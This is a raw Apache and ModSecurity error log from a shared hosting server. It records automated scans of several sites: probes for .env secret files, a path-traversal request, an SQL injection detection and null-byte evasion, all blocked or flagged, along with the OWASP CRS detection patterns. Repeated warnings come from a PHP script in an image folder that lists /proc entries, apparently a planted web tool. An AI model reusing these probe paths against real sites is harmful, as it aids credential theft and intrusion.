[Tue May 12 04:36:29.256535 2026] [core:error] [pid 1820198:tid 1820217] [client 52.141.35.48:3846] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:29.956156 2026] [core:error] [pid 1808852:tid 1808865] [client 52.141.35.48:3814] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:29.956180 2026] [core:error] [pid 1808852:tid 1808865] [client 52.141.35.48:3814] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720863/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720863/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720863/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720863/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1720863/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1720863/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:36:30.661123 2026] [core:error] [pid 1730207:tid 1730210] [client 52.141.35.48:3861] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:30.661148 2026] [core:error] [pid 1730207:tid 1730210] [client 52.141.35.48:3861] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:31.379662 2026] [core:error] [pid 1730175:tid 1730193] [client 52.141.35.48:3864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:31.379686 2026] [core:error] [pid 1730175:tid 1730193] [client 52.141.35.48:3864] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:32.089718 2026] [core:error] [pid 1808852:tid 1808858] [client 52.141.35.48:3799] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:32.089745 2026] [core:error] [pid 1808852:tid 1808858] [client 52.141.35.48:3799] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:32.840499 2026] [core:error] [pid 1730207:tid 1730214] [client 52.141.35.48:12860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:32.840535 2026] [core:error] [pid 1730207:tid 1730214] [client 52.141.35.48:12860] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:33.625334 2026] [core:error] [pid 1820198:tid 1820223] [client 52.141.35.48:12821] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:33.625366 2026] [core:error] [pid 1820198:tid 1820223] [client 52.141.35.48:12821] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:34.355088 2026] [core:error] [pid 1730175:tid 1730178] [client 52.141.35.48:13216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:34.355111 2026] [core:error] [pid 1730175:tid 1730178] [client 52.141.35.48:13216] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:35.056294 2026] [core:error] [pid 1808852:tid 1808855] [client 52.141.35.48:3884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:35.056324 2026] [core:error] [pid 1808852:tid 1808855] [client 52.141.35.48:3884] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:35.464130 2026] [authz_core:error] [pid 1820198:tid 1820220] [client 176.120.22.46:64683] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/ID3/error_log, referer: https://www.maelbailly.fr/wp-includes/ID3/
[Tue May 12 04:36:35.812994 2026] [core:error] [pid 1730207:tid 1730228] [client 52.141.35.48:3792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:35.813024 2026] [core:error] [pid 1730207:tid 1730228] [client 52.141.35.48:3792] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:36.602589 2026] [core:error] [pid 1820198:tid 1820212] [client 52.141.35.48:14405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:36.602612 2026] [core:error] [pid 1820198:tid 1820212] [client 52.141.35.48:14405] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:37.391942 2026] [core:error] [pid 1730207:tid 1730218] [client 52.141.35.48:13217] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:37.391976 2026] [core:error] [pid 1730207:tid 1730218] [client 52.141.35.48:13217] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:38.146333 2026] [core:error] [pid 1820198:tid 1820214] [client 52.141.35.48:12837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:38.146362 2026] [core:error] [pid 1820198:tid 1820214] [client 52.141.35.48:12837] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:38.920009 2026] [core:error] [pid 1808852:tid 1808864] [client 52.141.35.48:3777] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:38.920039 2026] [core:error] [pid 1808852:tid 1808864] [client 52.141.35.48:3777] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:39.668974 2026] [core:error] [pid 1820198:tid 1820216] [client 52.141.35.48:14407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:39.669001 2026] [core:error] [pid 1820198:tid 1820216] [client 52.141.35.48:14407] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:40.397416 2026] [core:error] [pid 1820198:tid 1820208] [client 52.141.35.48:13233] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:40.397453 2026] [core:error] [pid 1820198:tid 1820208] [client 52.141.35.48:13233] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:41.199553 2026] [core:error] [pid 1730175:tid 1730187] [client 52.141.35.48:14401] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:41.199580 2026] [core:error] [pid 1730175:tid 1730187] [client 52.141.35.48:14401] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 04:36:41.835126 2026] [authz_core:error] [pid 1808852:tid 1808866] [client 176.120.22.46:53283] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/IXR/error_log, referer: https://www.maelbailly.fr/wp-includes/IXR/
[Tue May 12 04:36:54.572064 2026] [authz_core:error] [pid 1730207:tid 1730211] [client 176.120.22.46:62478] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/
[Tue May 12 04:37:00.909561 2026] [authz_core:error] [pid 1730175:tid 1730193] [client 176.120.22.46:50372] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/library/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/library/
[Tue May 12 04:37:03.803804 2026] [security2:error] [pid 1808852:tid 1808879] [client 150.109.12.46:44516] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/familles/embed/"] [unique_id "agKSTxfeipD4uoG21FohgQAAABg"]
[Tue May 12 04:37:07.263884 2026] [authz_core:error] [pid 1730207:tid 1730210] [client 176.120.22.46:55862] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/src/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/src/
PHP Warning:  filesize(): stat failed for /proc/38/task/38/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/38/task/38/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/38/task/38/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/38/task/38/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/38/task/38/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/38/task/38/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:37:13.434842 2026] [security2:error] [pid 1730207:tid 1730232] [client 144.76.32.114:43114] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: da15c023810551792091b6e937d8079f||1778555233||1778554873"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2017/06/Depositphotos_11636543_original.jpg"] [unique_id "agKSWTue9Sp-pIv_Bb60JwAAAVc"]
[Tue May 12 04:37:13.435073 2026] [security2:error] [pid 1730207:tid 1730232] [client 144.76.32.114:43114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-content/uploads/2017/06/Depositphotos_11636543_original.jpg"] [unique_id "agKSWTue9Sp-pIv_Bb60JwAAAVc"]
[Tue May 12 04:37:13.589420 2026] [authz_core:error] [pid 1730175:tid 1730186] [client 176.120.22.46:60520] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/src/Auth/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/src/Auth/
[Tue May 12 04:37:14.031758 2026] [security2:error] [pid 1730207:tid 1730232] [client 144.76.32.114:43114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agKSWTue9Sp-pIv_Bb60JwAAAVc"]
[Tue May 12 04:37:25.167074 2026] [:error] [pid 1808852:tid 1808864] [client 129.222.203.26:48150] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Tue May 12 04:37:26.401395 2026] [authz_core:error] [pid 1808852:tid 1808867] [client 176.120.22.46:52749] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/src/Exception/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/src/Exception/
[Tue May 12 04:37:32.751638 2026] [authz_core:error] [pid 1820198:tid 1820209] [client 176.120.22.46:57438] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/src/Proxy/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/src/Proxy/
[Tue May 12 04:37:37.959385 2026] [security2:error] [pid 1730207:tid 1730222] [client 43.157.53.115:58786] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agKScTue9Sp-pIv_Bb60YwAAAU0"]
[Tue May 12 04:37:39.243769 2026] [authz_core:error] [pid 1730207:tid 1730209] [client 176.120.22.46:61688] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/src/Response/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/src/Response/
[Tue May 12 04:37:45.586354 2026] [authz_core:error] [pid 1808852:tid 1808879] [client 176.120.22.46:51026] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/Requests/src/Transport/error_log, referer: https://www.maelbailly.fr/wp-includes/Requests/src/Transport/
[Tue May 12 04:37:58.350871 2026] [authz_core:error] [pid 1730175:tid 1730182] [client 176.120.22.46:61419] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/error_log, referer: https://www.maelbailly.fr/wp-includes/SimplePie/
[Tue May 12 04:38:04.769052 2026] [authz_core:error] [pid 1730175:tid 1730183] [client 176.120.22.46:50672] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/library/error_log, referer: https://www.maelbailly.fr/wp-includes/SimplePie/library/
[Tue May 12 04:38:06.922041 2026] [:error] [pid 1820198:tid 1820206] [client 47.128.120.149:44810] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 04:38:11.195223 2026] [authz_core:error] [pid 1730207:tid 1730226] [client 176.120.22.46:57907] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/library/SimplePie/error_log, referer: https://www.maelbailly.fr/wp-includes/SimplePie/library/SimplePie/
[Tue May 12 04:38:17.652362 2026] [authz_core:error] [pid 1730175:tid 1730189] [client 176.120.22.46:62666] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/src/error_log, referer: https://www.maelbailly.fr/wp-includes/SimplePie/src/
[Tue May 12 04:38:24.007612 2026] [authz_core:error] [pid 1730175:tid 1730186] [client 176.120.22.46:51659] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/SimplePie/src/Cache/error_log, referer: https://www.maelbailly.fr/wp-includes/SimplePie/src/Cache/
[Tue May 12 04:38:46.844947 2026] [security2:error] [pid 1820198:tid 1820218] [client 43.134.51.171:42244] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/concert/rock/"] [unique_id "agKSts1tk6y7yBJLpJopVQAAAJI"]
[Tue May 12 04:38:58.203986 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:49950] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /static../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSws1tk6y7yBJLpJopagAAAIU"]
[Tue May 12 04:38:58.204110 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:49950] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSws1tk6y7yBJLpJopagAAAIU"]
[Tue May 12 04:38:58.204231 2026] [security2:error] [pid 1820198:tid 1820205] [client 45.148.10.166:49950] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env"] [unique_id "agKSws1tk6y7yBJLpJopagAAAIU"]
[Tue May 12 04:38:58.204409 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:49990] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env~"] [unique_id "agKSws1tk6y7yBJLpJopawAAAJc"]
[Tue May 12 04:38:58.204678 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/config/.env"] [unique_id "agKSwhfeipD4uoG21FoiYQAAAAw"]
[Tue May 12 04:38:58.204812 2026] [security2:error] [pid 1808852:tid 1808867] [client 45.148.10.166:49832] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/config/.env"] [unique_id "agKSwhfeipD4uoG21FoiYQAAAAw"]
[Tue May 12 04:38:58.206864 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.166:49962] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/api/.env"] [unique_id "agKSwjue9Sp-pIv_Bb60_AAAAUE"]
[Tue May 12 04:38:58.207307 2026] [security2:error] [pid 1820198:tid 1820223] [client 45.148.10.166:49990] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env~"] [unique_id "agKSws1tk6y7yBJLpJopawAAAJc"]
[Tue May 12 04:38:58.208649 2026] [security2:error] [pid 1730175:tid 1730200] [client 45.148.10.166:49954] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.development"] [unique_id "agKSwno6NvB9WXx5V-6eoQAAARc"]
[Tue May 12 04:38:58.208863 2026] [security2:error] [pid 1730175:tid 1730200] [client 45.148.10.166:49954] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.development"] [unique_id "agKSwno6NvB9WXx5V-6eoQAAARc"]
[Tue May 12 04:38:58.212326 2026] [security2:error] [pid 1730207:tid 1730210] [client 45.148.10.166:49962] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/api/.env"] [unique_id "agKSwjue9Sp-pIv_Bb60_AAAAUE"]
[Tue May 12 04:38:58.223028 2026] [security2:error] [pid 1730175:tid 1730181] [client 45.148.10.166:50002] ModSecurity: Warning. Found 1 byte(s) in REQUEST_URI outside range: 1-255. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "287"] [id "920270"] [rev "2"] [msg "Invalid character in request (null character)"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "tchatbooster.com"] [uri "/api/v1/health"] [unique_id "agKSwno6NvB9WXx5V-6enwAAAQQ"]
